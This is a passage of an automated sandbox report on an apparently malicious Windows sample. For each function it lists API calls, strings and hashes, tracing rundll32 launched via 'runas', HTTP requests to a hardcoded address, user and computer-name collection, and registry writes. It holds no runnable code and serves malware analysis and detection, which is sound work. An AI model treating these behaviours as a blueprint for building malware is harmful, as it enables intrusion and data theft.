                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ExecuteShell
                                          • String ID: runas$rundll32.exe
                                          • API String ID: 587946157-4081450877
                                          • Opcode ID: 53bd2852a35dbc702f8edcd94fe13b2426d1b254f4a7d3d5a0762a005ce32cbc
                                          • Instruction ID: 2aff4b1b752e807641370edaa76e6a0b898d0b90017439f735c27e36d33a6469
                                          • Opcode Fuzzy Hash: 53bd2852a35dbc702f8edcd94fe13b2426d1b254f4a7d3d5a0762a005ce32cbc
                                          • Instruction Fuzzy Hash: 3EA13E71600109AFEF18DF28CC89BDE7B66EF85314F508518F8148B2D6D739D985EBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F10567, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00010573,00F1006C), ref: 00F1056C
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: 1147e91df718062fa745bfa666ecf156e5c3766576d18fc0cc57608059ec4525
                                          • Instruction ID: 08336b17012e35458ce4148202868ce15bb43b8df2dc307a250c106e09e1d2cf
                                          • Opcode Fuzzy Hash: 1147e91df718062fa745bfa666ecf156e5c3766576d18fc0cc57608059ec4525
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F06B90, Relevance: 57.2, APIs: 25, Strings: 5, Instructions: 4701networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InternetOpenW.WININET(00F2CDDC,00000000,00000000,00000000,00000000), ref: 00F06BBC
                                          • InternetConnectA.WININET(00000000,00F0C50C,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00F06BDE
                                          • HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 00F06C23
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: InternetOpen$ConnectHttpRequest
                                          • String ID: 152138533219$5120$:::$invalid stoi argument$stoi argument out of range
                                          • API String ID: 3864186401-2319865195
                                          • Opcode ID: af1a4dcd0fbe83f9073d8a8b731dbe8ac940226fd0cba5286903db0eb95673af
                                          • Instruction ID: f57cb1fd965b5f8fd3760ddd163e8c6027980ecd965632193b6c5423432a59f3
                                          • Opcode Fuzzy Hash: af1a4dcd0fbe83f9073d8a8b731dbe8ac940226fd0cba5286903db0eb95673af
                                          • Instruction Fuzzy Hash: 49833A71A002049BEF18EF78CC8579DBB72AF81304F108658E415AB3D7DB79DA85BB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F05F80, Relevance: 32.3, APIs: 16, Strings: 2, Instructions: 789COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID: ($abAp
                                          • API String ID: 0-533868396
                                          • Opcode ID: 22bf057758464148dad670ca3a999ec453bb4e723e2036c313755088581e1c15
                                          • Instruction ID: b62fb634904ebeca61c2d7163afb820352cbb0ad9a46838c904929df674b2664
                                          • Opcode Fuzzy Hash: 22bf057758464148dad670ca3a999ec453bb4e723e2036c313755088581e1c15
                                          • Instruction Fuzzy Hash: E9522671A002099BEF28DF68CC85B9EB776EF85304F108298F405E72D6DB759A94EF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F01DA0, Relevance: 27.2, APIs: 18, Instructions: 157memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,00F04DB3), ref: 00F01DCA
                                          • GetProcessHeap.KERNEL32(00000008,00F04DB3), ref: 00F01DDF
                                          • HeapAlloc.KERNEL32(00000000), ref: 00F01DE2
                                          • GetUserNameW.ADVAPI32(00000000,00F04DB3), ref: 00F01DF0
                                          • LookupAccountNameW.ADVAPI32(00000000,?,00000000,00F04DB3,00000000,?,?), ref: 00F01E13
                                          • GetProcessHeap.KERNEL32(00000008,00F04DB3), ref: 00F01E1E
                                          • HeapAlloc.KERNEL32(00000000), ref: 00F01E21
                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 00F01E31
                                          • HeapAlloc.KERNEL32(00000000), ref: 00F01E34
                                          • LookupAccountNameW.ADVAPI32(00000000,?,00000000,00F04DB3,00000000,?,?), ref: 00F01E5E
                                          • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00F01E71
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00F01F02
                                          • HeapFree.KERNEL32(00000000), ref: 00F01F0B
                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F01F10
                                          • HeapFree.KERNEL32(00000000), ref: 00F01F13
                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F01F1A
                                          • HeapFree.KERNEL32(00000000), ref: 00F01F1D
                                          • LocalFree.KERNEL32(00000000), ref: 00F01F22
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Heap$Process$FreeName$Alloc$AccountLookupUser$ConvertLocalString
                                          • String ID:
                                          • API String ID: 3326663573-0
                                          • Opcode ID: 199cd68a2a2cbf2e87e06efa2c479f310e765de64c5b00c8377c32a3411d8526
                                          • Instruction ID: b41d243bd4ff8fc77e69d80420d67575a36ab5b42215774a04a0101123df0bef
                                          • Opcode Fuzzy Hash: 199cd68a2a2cbf2e87e06efa2c479f310e765de64c5b00c8377c32a3411d8526
                                          • Instruction Fuzzy Hash: E3513D75E00219ABDB20EFA5DC85BAFBBBCFB44350F144559E905A3280DB749E05ABA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F1DBF8, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00F1D8B1: CreateFileW.KERNEL32(00000000,00000000,?,00F1DCA1,?,?,00000000,?,00F1DCA1,00000000,0000000C), ref: 00F1D8CE
                                          • GetLastError.KERNEL32 ref: 00F1DD0C
                                          • __dosmaperr.LIBCMT ref: 00F1DD13
                                          • GetFileType.KERNEL32(00000000), ref: 00F1DD1F
                                          • GetLastError.KERNEL32 ref: 00F1DD29
                                          • __dosmaperr.LIBCMT ref: 00F1DD32
                                          • CloseHandle.KERNEL32(00000000), ref: 00F1DD52
                                          • CloseHandle.KERNEL32(00F1649E), ref: 00F1DE9F
                                          • GetLastError.KERNEL32 ref: 00F1DED1
                                          • __dosmaperr.LIBCMT ref: 00F1DED8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                          • String ID: H
                                          • API String ID: 4237864984-2852464175
                                          • Opcode ID: 4ea7ca091af20ebff74b8baf917621140384d3edc2028c5e3247b2503598d007
                                          • Instruction ID: 40b842017ad8a2d066392dc44ae1810d7669e2841b12a47b7eeb6d0717b510bd
                                          • Opcode Fuzzy Hash: 4ea7ca091af20ebff74b8baf917621140384d3edc2028c5e3247b2503598d007
                                          • Instruction Fuzzy Hash: 66A13332A041489FCF19EF68DC91BEE7BB1AB46330F140159E811AF391DB399986EB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F02430, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 136networkfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 00F024D1
                                          • InternetOpenUrlW.WININET(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F024E3
                                          • InternetReadFile.WININET(00000000,?,00032000,00032000), ref: 00F024FA
                                          • InternetCloseHandle.WININET(00000000), ref: 00F0250B
                                          • InternetCloseHandle.WININET(00000000), ref: 00F0250E
                                          • InternetCloseHandle.WININET(00000000), ref: 00F0251F
                                          • InternetCloseHandle.WININET(00000000), ref: 00F02522
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Internet$CloseHandle$Open$FileRead
                                          • String ID: <$Microsoft Internet Explorer$runas
                                          • API String ID: 4294395943-436926838
                                          • Opcode ID: e5db2afc5f2f8f78febd03a6b52b2d8d14deb7a6c3502436748876ad17d1fe3f
                                          • Instruction ID: 91673539c51d09ec336edfba4e4e3e548b23f69b20ba5e081ec1b2c4f1e598c4
                                          • Opcode Fuzzy Hash: e5db2afc5f2f8f78febd03a6b52b2d8d14deb7a6c3502436748876ad17d1fe3f
                                          • Instruction Fuzzy Hash: 7C410331E00219ABDB18DF64CC89BAEBBB9EF45300F108159F515A72D1D738AA41EFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F0CA50, Relevance: 13.6, APIs: 5, Strings: 2, Instructions: 1365libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00F04010: GetVersionExW.KERNEL32(0000011C,?,?,80000001), ref: 00F04066
                                            • Part of subcall function 00F042C0: GetVersionExW.KERNEL32(0000011C,?,?,00000000), ref: 00F04316
                                            • Part of subcall function 00F01DA0: GetUserNameW.ADVAPI32(00000000,00F04DB3), ref: 00F01DCA
                                            • Part of subcall function 00F01DA0: GetProcessHeap.KERNEL32(00000008,00F04DB3), ref: 00F01DDF
                                            • Part of subcall function 00F01DA0: HeapAlloc.KERNEL32(00000000), ref: 00F01DE2
                                            • Part of subcall function 00F01DA0: GetUserNameW.ADVAPI32(00000000,00F04DB3), ref: 00F01DF0
                                            • Part of subcall function 00F01DA0: LookupAccountNameW.ADVAPI32(00000000,?,00000000,00F04DB3,00000000,?,?), ref: 00F01E13
                                            • Part of subcall function 00F01DA0: GetProcessHeap.KERNEL32(00000008,00F04DB3), ref: 00F01E1E
                                            • Part of subcall function 00F01DA0: HeapAlloc.KERNEL32(00000000), ref: 00F01E21
                                            • Part of subcall function 00F01DA0: GetProcessHeap.KERNEL32(00000008,?), ref: 00F01E31
                                            • Part of subcall function 00F01DA0: HeapAlloc.KERNEL32(00000000), ref: 00F01E34
                                            • Part of subcall function 00F01DA0: LookupAccountNameW.ADVAPI32(00000000,?,00000000,00F04DB3,00000000,?,?), ref: 00F01E5E
                                            • Part of subcall function 00F01DA0: ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00F01E71
                                          • LoadLibraryA.KERNEL32(00000000), ref: 00F0CABA
                                          • GetProcAddress.KERNEL32(00000000,000002A8), ref: 00F0CB14
                                          • FreeLibrary.KERNEL32(00000000), ref: 00F0CB1F
                                          • GetUserNameW.ADVAPI32(?,00000100), ref: 00F0CB92
                                          • GetComputerNameExW.KERNEL32(00000002,?,00000100,?,?,?), ref: 00F0CC72
                                            • Part of subcall function 00F0EBB0: Concurrency::cancel_current_task.LIBCPMT ref: 00F0EC64
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: HeapName$AllocProcessUser$AccountLibraryLookupVersion$AddressComputerConcurrency::cancel_current_taskConvertFreeLoadProcString
                                          • String ID: 152138533219$1e680d
                                          • API String ID: 1144133639-2430080948
                                          • Opcode ID: 8ac6177e0f588c638ab16b4d8daa4bce1f93e77d2cb55d43855a4acbf6db3325
                                          • Instruction ID: 1ea6dd5b77f7d353710829db7f54446db54ec0da7547c30f869d26ff3389daee
                                          • Opcode Fuzzy Hash: 8ac6177e0f588c638ab16b4d8daa4bce1f93e77d2cb55d43855a4acbf6db3325
                                          • Instruction Fuzzy Hash: 6DB20871A001158BEF2DDB68CC8979EB736AB81304F1086D8E409973E6DB399FC4BB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F1E774, Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 373timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • W. Europe Standard Time, xrefs: 00F1EA28
                                          • W. Europe Daylight Time, xrefs: 00F1EA57
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free$InformationTimeZone
                                          • String ID: W. Europe Daylight Time$W. Europe Standard Time
                                          • API String ID: 597776487-986674615
                                          • Opcode ID: f7acb68321712db916d9955de1862b9f8d414ecdad42219e9002c30a6aff5e7a
                                          • Instruction ID: f2f82db751405eddc8c1c667687e9220f8e89be49ff21b34b833701b0745aeda
                                          • Opcode Fuzzy Hash: f7acb68321712db916d9955de1862b9f8d414ecdad42219e9002c30a6aff5e7a
                                          • Instruction Fuzzy Hash: E0C10772E002099BDB249F68DC51BEA7BA9AF56330F144069EC91D7281E7399DC1F750
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F04010, Relevance: 9.2, APIs: 6, Instructions: 235libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetVersionExW.KERNEL32(0000011C,?,?,80000001), ref: 00F04066
                                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00F040C0
                                          • GetProcAddress.KERNEL32(00000000), ref: 00F040C7
                                          • GetNativeSystemInfo.KERNEL32(?), ref: 00F04163
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AddressHandleInfoModuleNativeProcSystemVersion
                                          • String ID:
                                          • API String ID: 2167034304-0
                                          • Opcode ID: c6954d9dbb0650c0dbf30431c6767932f4461f00ce2a6f6b5968b1a5dc84ab59
                                          • Instruction ID: 347e4abb2f91027506e58c245e54fd4810330896cfd7daffc8b78f881daaa0d5
                                          • Opcode Fuzzy Hash: c6954d9dbb0650c0dbf30431c6767932f4461f00ce2a6f6b5968b1a5dc84ab59
                                          • Instruction Fuzzy Hash: 4C7106B1E092089BEB20DB68EC453ADB7A5EB45324F50029AED04D76D1EB75ADC0B7C1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F1E94F, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 171timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00F2B608), ref: 00F1E9B9
                                          • _free.LIBCMT ref: 00F1E9A7
                                            • Part of subcall function 00F16601: HeapFree.KERNEL32(00000000,00000000,?,00F1C89A,00000000,00000000,00000000,E800F310,?,00F1C8C1,00000000,00000007,00000000,?,00F1CCC3,00000000), ref: 00F16617
                                            • Part of subcall function 00F16601: GetLastError.KERNEL32(00000000,?,00F1C89A,00000000,00000000,00000000,E800F310,?,00F1C8C1,00000000,00000007,00000000,?,00F1CCC3,00000000,00000000), ref: 00F16629
                                          • _free.LIBCMT ref: 00F1EB73
                                          Strings
                                          • W. Europe Standard Time, xrefs: 00F1EA28
                                          • W. Europe Daylight Time, xrefs: 00F1EA57
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                                          • String ID: W. Europe Daylight Time$W. Europe Standard Time
                                          • API String ID: 2155170405-986674615
                                          • Opcode ID: 11a374f503209c6043ca6a5abf7e1069a22577880c6a1713e3d7c40d057ca109
                                          • Instruction ID: 7575659eb3dfe0bad23c94d272e7849849cff06c9148040a06ca11dfa65d8d53
                                          • Opcode Fuzzy Hash: 11a374f503209c6043ca6a5abf7e1069a22577880c6a1713e3d7c40d057ca109
                                          • Instruction Fuzzy Hash: D451B572D002199BDB14EF659C819EEBBBDBF45370B14026AE851E7291E7349EC0BB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F042C0, Relevance: 7.6, APIs: 5, Instructions: 146libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetVersionExW.KERNEL32(0000011C,?,?,00000000), ref: 00F04316
                                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00F04375
                                          • GetProcAddress.KERNEL32(00000000), ref: 00F0437C
                                          • GetNativeSystemInfo.KERNEL32(?), ref: 00F04414
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AddressHandleInfoModuleNativeProcSystemVersion
                                          • String ID:
                                          • API String ID: 2167034304-0
                                          • Opcode ID: 01b19e0f1d89f69c6884b9f62e67ab1b02f8422f6432b6e2a45da94eb6216dbe
                                          • Instruction ID: 4969dc2fc96d20be2d90289c58f0b7e523270f4117ffb450619f2c5173ac89ce
                                          • Opcode Fuzzy Hash: 01b19e0f1d89f69c6884b9f62e67ab1b02f8422f6432b6e2a45da94eb6216dbe
                                          • Instruction Fuzzy Hash: 924148B1E002189BDB24FB68DC4A7DEB775EF41320F5042A8ED00972D1EB356984BBD2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F12943, Relevance: 7.6, APIs: 5, Instructions: 141pipeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00F12875), ref: 00F12965
                                          • GetFileInformationByHandle.KERNEL32(?,?), ref: 00F129BF
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00F12875,?,000000FF,00000000,00000000), ref: 00F12A4D
                                          • __dosmaperr.LIBCMT ref: 00F12A54
                                          • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00F12A91
                                            • Part of subcall function 00F12CB9: __dosmaperr.LIBCMT ref: 00F12CEE
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                          • String ID:
                                          • API String ID: 1206951868-0
                                          • Opcode ID: b1d609a038efd3a87c9a89a771609c37ce42b84943cc2bfc8345b41114da8d11
                                          • Instruction ID: a412e5c5be4cf041d42b0657d6fb27dcfd88fac7031a23fa66aea2aa1c3ce5ff
                                          • Opcode Fuzzy Hash: b1d609a038efd3a87c9a89a771609c37ce42b84943cc2bfc8345b41114da8d11
                                          • Instruction Fuzzy Hash: 29416A71900248AFCB64DFA5DC459EFBBF9EF88310B004529F856D3210EA38A991EB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F05D50, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 188COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: __fread_nolock
                                          • String ID: jjh$jjj$jjjj
                                          • API String ID: 2638373210-3331015499
                                          • Opcode ID: 9ab8ec97e96a0247b898819ba551061b8cf0b2d1f15aa6cb85b2ff0f53bc870d
                                          • Instruction ID: 1b176018a732c8d003b1bfef05178c3ffc74f66661a3b8d4270f72b67de1bbad
                                          • Opcode Fuzzy Hash: 9ab8ec97e96a0247b898819ba551061b8cf0b2d1f15aa6cb85b2ff0f53bc870d
                                          • Instruction Fuzzy Hash: 5F513671A10105ABDB18EB68CC86BDF3A29AF85701F444518F4149B2C2D7BDDAC0FBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F049F0, Relevance: 6.3, APIs: 4, Instructions: 281COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,?), ref: 00F04A0D
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: FileModuleName
                                          • String ID:
                                          • API String ID: 514040917-0
                                          • Opcode ID: e5a03650b1b9ecb8cf6627133f7f395d9397bf3bdced1918ac39a950f51bf617
                                          • Instruction ID: d80facf30d2bc3bb53a17877af46820df728b442edb8a158b91558538992719d
                                          • Opcode Fuzzy Hash: e5a03650b1b9ecb8cf6627133f7f395d9397bf3bdced1918ac39a950f51bf617
                                          • Instruction Fuzzy Hash: BE912670E00209AFDF14EFA8DC95BEEBBB9EF44304F504158E511A72C1DB796A45EBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F02890, Relevance: 4.6, APIs: 3, Instructions: 127threadsleepinjectionCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00F0EF20: Concurrency::cancel_current_task.LIBCPMT ref: 00F0F041
                                          • CreateThread.KERNEL32(00000000,00000000,00F02820,00000000,00000000,00000000), ref: 00F028F6
                                          • Sleep.KERNEL32(00001388,?,?,?,?,?,?,?,?,00F09323,?,00000000,00000000), ref: 00F02903
                                          • SuspendThread.KERNEL32(00000000,?,?,?,?,?,?,?,?,00F09323,?,00000000,00000000), ref: 00F0290A
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Thread$Concurrency::cancel_current_taskCreateSleepSuspend
                                          • String ID:
                                          • API String ID: 1039963361-0
                                          • Opcode ID: a6ad6e2da9ae7d2a1e1b90e8abbfd889838898a46bdf69e02fb4c2129358d1cd
                                          • Instruction ID: 4f1d42ecaee7bb2431aceeee8149a81acf702f92cda62e71070a1b0de05a43fa
                                          • Opcode Fuzzy Hash: a6ad6e2da9ae7d2a1e1b90e8abbfd889838898a46bdf69e02fb4c2129358d1cd
                                          • Instruction Fuzzy Hash: 66411831210248ABEB68DF28CC99B9D3B56EF45311F508618F955973D6CB39D4C0BB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F03EC0, Relevance: 4.6, APIs: 3, Instructions: 120registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegCreateKeyExA.KERNEL32(80000001,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 00F03EF1
                                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000002,80000001), ref: 00F03F10
                                          • RegSetValueExA.KERNEL32(80000001,?,00000000,00000001,?,?), ref: 00F03F3E
                                          Memory Dump Source
